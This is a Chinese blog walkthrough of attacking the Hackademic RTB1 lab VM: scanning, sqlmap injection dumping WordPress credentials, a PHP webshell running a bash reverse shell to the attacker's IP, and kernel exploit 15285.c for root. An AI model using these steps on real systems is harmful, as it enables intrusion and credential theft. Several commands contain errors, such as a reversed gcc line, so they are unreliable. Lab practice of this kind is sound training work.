Hackademic.PTR1靶机渗透
Hackademic.RTB1靶机渗透测试
是一个打包好的镜像
打开虚拟机选择我已移动虚拟机,不然没有网
信息收集
1.1 用 arp scan -l 扫描网段存活的主机
找到目标靶机:192.168.5.140
1.2 用 nmap 扫描开放端口的服务和版本
1.3 dirb 扫描目录
用 dirb http//:192.168.5.140/扫描扫不出来什么东西
要用 dirb http//:192.168.5.140/Hackademic.RTB1 扫描二级目录
http://192.168.5.140/Hackademic_RTB1/wp-admin/ 这个目录应该是有用的
漏洞利用
2.1 xmlrpc 目录
但是页面提示只能 post请求
1 | curl -x POST ``http://192.168.5.140/Hackademic_RTB1``/xmlrpc.php |
用 msfconsole 做进一步的渗透测试
但是返回的结果显示这个页面没有实际的功能
2.2 sql 注入(get)
http://192.168.5.140/Hackademic_RTB1/?cat=1 这个页面很明显的有一个 ?cat=1 看起来像是 sql注入点
我们使用sqlmap 进行测试
1 | sqlmap -u "``http://192.168.5.140/Hackademic_RTB1/?cat=1``" |
结果显示确实存在 sql 注入
尝试爆表
1 | sqlmap -u "``http://192.168.5.140/Hackademic_RTB1/?cat=1``" -dbs |
1 | sqlmap -u "``http://192.168.5.140/Hackademic_RTB1/?cat=1``"-D wordpress --tables --batch |
1 | sqLmap -u "``http://192.168.5.140/Hackademic`` RTB1/?cat=1" -C user l0gin,user pass -D wordpress -T wp-users --dump -batch |
获得了所有的用户
经过尝试之后发现
GeorgeMiLLer:q1w2e3 这个用户的权限最高
用这个用户登录
2.3 RCE
在登录进去的后台里面有一个文件上传的模块可以修改
我们把允许上传的文件后缀加一个 .php
然后上传一句话木马
1 | exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.5.130/4444 0>&1'"); |
在上传文件的目录里面找到他
在kali里面开一个监听
然后点击运行
1 | nc -lvnp 4444 |
成功监听到
并建立严格的 tty 交互终端
2.4 内核提权
用 uname -a 得到内核版本
用
1 | searchsploit linux 2.6.3 |
搜索可利用的漏洞脚本
经过不断的尝试,最终确定可以利用的脚本
把它扒下来
1 | locate linux/local/15285.c |
建立一个 http 服务 把木马传上去
1 | gcc -o 15285.c exp |
`
成功提权
完成最后的任务
2.5 xss
存储型xss
存储型xss
存储型xss
存储型xss
存储型xss
存储型xss
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Tubby Little Hero!
